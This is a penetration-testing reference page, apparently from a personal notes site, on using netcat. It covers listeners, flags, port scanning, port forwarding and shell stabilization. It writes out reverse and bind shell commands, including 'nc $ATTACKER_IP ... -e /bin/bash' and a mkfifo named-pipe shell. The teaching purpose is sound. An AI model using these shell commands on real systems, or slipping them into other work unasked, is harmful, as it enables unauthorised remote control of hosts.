Cardboard Iguana Security
spells
Abusing wildcard expansion in Bash
Access the Windows Registry using PowerShell
Add Windows users at the command line
Aircrack-NG
ARP scanning
ARP
AS-REP roasting with Impacket
AS-REP roasting With Rubeus
AS-REP roasting
Automate Netlify builds with IFTTT
Automatically stabilize a reverse shell with socat
Avoid dropping privileges with SUID Bash
awk
Backdoor Visual Basic Scripts
basenc
Bash reverse shell
Bash scripting
Bulk edit Windows permissions
Burp Suite
Bypass the PowerShell execution policy
Bypass Windows antivirus with C Sharp
Calculate a file hash on Windows with CertUtil
Call Mimikatz from a meterpreter shell
cat
cewl
Change a branch name in Git
Change an RSA key passphrase with OpenSSL
Cisco IOS
Common Windows user types
Compact VM disk images
Confirm the existence of a Gmail address
crackmapexec
Create a GPG key with SSH support
Create a zip bomb
CUPP
Day One to Obsidian conversion script
DCERPC
Debugging Bash scripts
Default CIFS shares
dig
dir
Disable AMSI
DRSUAPI
Easy reverse DNS lookups
enum4linux
Enumerate AD CS templates with CertUtil
Equivalent Windows and UNIX commands
Evil-WinRM
Exploit LD_LIBRARY_PATH
Exploit LD_PRELOAD
Exploit local Windows services
Exploit local Windows tasks
Exploit remote Windows services
Exploit remote Windows tasks
Exploit the Bash PS4 prompt
Exploit the Windows DLL search order
Exploit the Windows FoDHelper
Exploit the WinLogon initialization sequence
Exploit VBA scripts with msfvenom
Exploit weak etc-passwd permissions
Exploit weak etc-shadow permissions
Exploit Windows file associations
Exploit Windows HTML applications with msfvenom
Exploit Windows services
Exploit Windows shortcut files
Exploit Windows tasks
Export highlights and annotations from Kobo eReaders
Extract the webpage title from a URL
ffmpeg
Find and replace a single line in a large text file
Find executables with SUID capabilities
find
findstr
finger
Fix EXIF data on Google Photos exports
FTP
FTPS
fuff
gdb
Gemini compatible markdown
Get a shell from ViM
Get an SSL certificate
Get-FileHash
Get-WinEvent
Git on Windows
gobuster
Golden and silver ticket attacks
grep
Hashcat
HTML applications
HTTP
Hydra
icacls
ICMP
iftop
IIS configuration data
IMAP
Impacket
Invoke-Mimikatz
Invoke-WebRequest
iOS quirks
ipconfig
IPSec
IPv4
Java
John the Ripper
JSON Web Tokens
Kerberoasting with Impacket
Kerberoasting with Rubeus
Kerberoasting
Kerberos
Kerbrute
less
Load a shell with a simple executable
Local file inclusion attacks
Look up unicode symbols and emojis
MAC address
Magic numbers
man
Match files to packages in Debian-based operating systems
Match files to packages in Red Hat-based operating systems
Metasploit MS SQL modules
meterpreter
Mimikatz
MITRE ATTaCK emulation plans
more
MS SQL
msfconsole
msfvenom
MySQL
nano
nbtscan
net
netcat
netsh
netstat
NFS
Nikto
Nmap
Node.js
nslookup
NTLM hashes
Oracle SQL Server
OSI model
OWASP ZAP
Perl
PHP local file inclusion attacks
PHP
ping
Poison null byte attack
Poison null byte in PHP
Polkit
Pop a SYSTEM shell on the Windows login screen using sticky keys
Pop a SYSTEM shell on the Windows login screen using Utilman
POP3
Port scanning with Bash
POSIX process signals
Powercat
PowerShell reverse shell
PowerView
ps
Pull SSL certificates from an external server
Python
Quick-n-dirty Python web server
Quickly bypass ssh-agent
Quickly find the canonical path of a file
RCE via XXE in PHP
Read a file beginning with a dash
reg
RegEx metacharacters
Remotely install a Windows package with PowerShell
Remove duplicate lines in Bash
Retrieve AIX fileset information
Retrieve AIX system information
Rubeus
Ruby
Run a remote Windows command using PowerShell
Run commands directly with PowerShell
RunAs
Send a command using OpenSSL
Set the PATH in a session on UNIX-like operating systems
Set the PATH in a session on Windows
Set up WMI in PowerShell
Shell stabilization
SIP
smbclient
smbget
smbmap
SMTP
socat
SQL injection attacks
SQLMap
ss
SSH
sudo
systemctl
systeminfo
tar
TCP header flags
TCP headers
TCP window size
TCP
tcpdump
Telnet
The Harvester
tmux
Transfer files over FTP using netcat
UDP
unbuffer
Uniform resource locators
UNIX file descriptors
UNIX password hashes
UNIX permissions
Unquoted path handling in Windows
Upgrade PostgreSQL
Use a Raspberry Pi 4B as hacking accessory
Use an alternate SSH key with Git
Use Bash functions to backdoor executables
Use Burp Suite with Firefox
Use Burp Suite with mobile apps
Use curl and jq with web APIs
Use OpenSSL to encrypt and decrypt files
Use the Windows Firewall to relay ports
Use unsupported display resolutions with Samsung DeX
Use WinRM with PowerShell
Useful built-in commands for Linux reconnaissance
Useful built-in commands for Windows reconnaissance
Useful Linux reconnaissance scripts
Useful scripts for Windows reconnaissance
ViM
Visual Basic for Applications
wfuzz
whoami
Wi-Fi
Windows DLL search order
Windows event IDs
Windows event logs
Windows local service accounts
Windows logon scripts
Windows permissions
Windows reconnaissance with PowerShell
Windows Remote Management
Windows Run and RunOnce Registry keys
Windows Scripting Host
Windows SeBackup and SeRestore permissions
Windows SeImpersonate and SeAssignPrimaryToken permissions
Windows service ACLs
Windows services
Windows SeTakeOwnership permission
Windows Startup folder
Windows unattended installation data
winrs
Wireshark
wmic
Work with base64 encoding using PowerShell
Work with remote services using WMI and PowerShell
Work with remote tasks using WMI and PowerShell
Working with services in PowerShell
XFreeRDP
XSS attacks
Xterm
xxd
XXE attacks
youtube-dl
Cardboard Iguana Security
Cardboard Iguana Security

netcat

The netcat binary is usually nc, but some systems have it as ncat or netcat instead.

Start a server 

nc -l -p $PORT $HOST

The $HOST specification here is optional; if left off, netcat binds to 0.0.0.0.

Note that netcat will exit once the first connection closes.

(According to the netcat docs, it looks like nc -l $HOST $PORT should also work, but it doesn't. I think - though I haven't been able to verify - that what's happening here is that -p specifies the port to listen to, while the port following the $HOST specification is the port to connect to.)

A netcat server doesn't have to be used just for reverse shells. For example, you can also use it to catch web requests in conjunction with XSS or SQLi attacks.

Start a client 

nc $HOST $PORT

Some versions of netcat support an -e flag that hooks STDIN and STDOUT of an executable to the established network connection. So something like the following will establish a reverse shell:

nc -e /bin/bash $HOST $PORT
Important

The -e flag (and similar -c flag) is considered a security risk (for obvious reasons!) and is disabled on many systems.

Useful flags

  • -l - listen for incoming connections (rather than make an outgoing connection)
  • -v - verbose
  • -n - skip DNS resolution (slightly faster, less noisy on the network)
  • -p - specify the port to listen to
  • -u - connect using UDP instead of TCP
  • -k - keep listening even after client disconnects
Important

The -c and -e flags, which allow netcat to hook other applications, are considered security risks (for obvious reasons!) and are disabled on many systems.

Reverse shells

Example reverse shell:

  • Attacker: nc -lvnp $LISTENER_PORT
  • Target: nc $ATTACKER_IP $LISTENER_PORT -e /bin/bash

It's also possible to start the listener on the target and then connect from the attacker system; this is sometimes called a "bind" shell:

  • Attacker: nc $TARGET_IP $LISTENER_PORT
  • Target: nc -lvnp $LISTENER_PORT -e /bin/bash

These are almost, but not quite, mirror images of each other.

Important

The -e flag (and similar -c flag) is considered a security risk (for obvious reasons!) and is disabled on many systems.

If the -c or -e flags aren't available (which is normal these days), then named pipes can be used instead:

mkfifo /tmp/p; \
nc -lvnp $LISTENER_PORT < /tmp/p | \
	/bin/sh >/tmp/p 2>&1; \
rm /tmp/p

(Note that it's also possible to reverse the /bin/sh and netcat portions of things; what important is that the named pipe lets us loop I/O between the two applications. See the discussion of msfvenom payloads for a detailed breakdown of this pattern.)

Initial netcat reverse shells (in particular web shells) are non-interactive.

Shell "stabilization"

Shell stabilization

Shell stabilization

Shell "stabilization" refers to the process of making a remote shell behave like a normal local shell - so, allowing interactive programs to work properly, ensuring that input is not echoed inappropriately, etc. In practice, this generally involves creating a second connection from within the "unstable" shell, and then using that (keeping the first connection around just so you can restart the "stabilized" shell if you accidentally exit/kill it).

A common method of stabilizing netcat shells is to use Python:

  • Start an instance of Bash connected to an actual PTTY: env TERM=xterm python -c 'import pty; pty.spawn("/bin/bash")'
  • Suspend the reverse shell.
  • Use stty raw -echo; fg to switch to raw keycode transmission (so that things like arrow keys get pushed to our remote shell), turn off terminal echo (to prevent seeing commands twice), and foreground the reverse shell.

Note that the stty command can be canceled using reset (after closing the reverse shell). Since echo is turned off, typing this won't be visible. Trust the force!

The rlwrap package will handle almost all of this for you.

rlwrap -cAr nc -lvnp $PORT

Or just use socat!

Tip

In none of these cases will the reverse shell pick up on your terminal size, so you'll need to manually specify it using stty rows and stty cols.

Port scanning

With the -z option, netcat will attempt to connect to all TCP ports on the targets in a sequential fashion (if no ports are specified; otherwise just to the specified port), reporting which are open. It's like a simple, very slow version of Nmap!

Use -w to set the timeout in seconds.

Use -u to try connecting over UDP rather than TCP.

Port forwarding 

nc -lvkp $LOCAL_PORT -c "nc $REMOTE_IP $REMOTE_PORT"

As a telnet replacement

If you just have netcat connect to a service directly, it functions exactly like telnet.

Links to this page
2021-10-10
2021-12-14
2022-04-03
Bash reverse shell
Exploit Windows HTML applications with msfvenom
Java
MS SQL
msfvenom
Perl
PHP
Powercat
Python
Ruby
Shell stabilization
socat
Transfer files over FTP using netcat
netcat
Interactive graph
On this page
netcat
Start a server
Start a client
Useful flags
Reverse shells
Shell "stabilization"
Port scanning
Port forwarding
As a telnet replacement
Powered by Obsidian Publish